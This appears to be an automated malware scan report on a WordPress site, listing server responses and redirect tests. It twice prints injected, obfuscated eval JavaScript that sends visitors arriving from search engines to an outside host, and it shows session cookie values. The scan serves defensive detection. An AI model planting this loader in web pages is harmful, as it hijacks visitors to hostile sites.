Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=driven-ent.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://driven-ent.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 27 Dec 2014 06:50:46 GMT Location: /driven Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://driven-ent.com/driven | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 06:50:47 GMT Location: http://driven-ent.com/driven/ Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://driven-ent.com/driven/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 06:50:48 GMT Location: http://www.driven-ent.com/driven/ Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7Ce4d76b81ae7e7980ac8e33c0ca2560eb; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/wp-content/plugins; httponly Set-Cookie: wordpress_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7Ce4d76b81ae7e7980ac8e33c0ca2560eb; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/wp-admin; httponly Set-Cookie: wordpress_logged_in_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7C5f0fac186b88570b3a1e30c798a7f029; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/; httponly X-Pingback: http://www.driven-ent.com/driven/xmlrpc.php X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://www.driven-ent.com/driven/ | 200 OK Content-Length: 39358 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?"+t+"="))!=-1||(q=r.4("&"+t+"="))!=-1))j.k="l://9"+"1."+"n"+"3"+"."+"8"+"9.1"+"s/"+"u.p"+"v?w"+"d=7&t"+"x"+"y="+r.z(q+2+t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{})) Antivirus reports:
| ||
http://www.driven-ent.com/driven/function.fopen | 404 Not Found Content-Length: 33769 Content-Type: text/html | clean |
http://www.driven-ent.com/driven/function.filesize | 404 Not Found Content-Length: 34613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?"+t+"="))!=-1||(q=r.4("&"+t+"="))!=-1))j.k="l://9"+"1."+"n"+"3"+"."+"8"+"9.1"+"s/"+"u.p"+"v?w"+"d=7&t"+"x"+"y="+r.z(q+2+t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{})) Antivirus reports:
| ||
http://www.driven-ent.com/driven/function.mysql-connect | 404 Not Found Content-Length: 33771 Content-Type: text/html | clean |
http://www.driven-ent.com/test404page.js | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
http://driven-ent.com/function.filesize | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
http://driven-ent.com/function.mysql-connect | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: driven-ent.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 27 Dec 2014 06:50:46 GMT
Location: /driven
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.27-pl0-gentoo
...0 bytes of data.
GET / HTTP/1.1
Host: driven-ent.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 27 Dec 2014 06:50:46 GMT
Location: /driven
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.27-pl0-gentoo
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: driven-ent.com
Referer: http://www.google.com/search?q=driven-ent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: driven-ent.com
Referer: http://www.google.com/search?q=driven-ent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.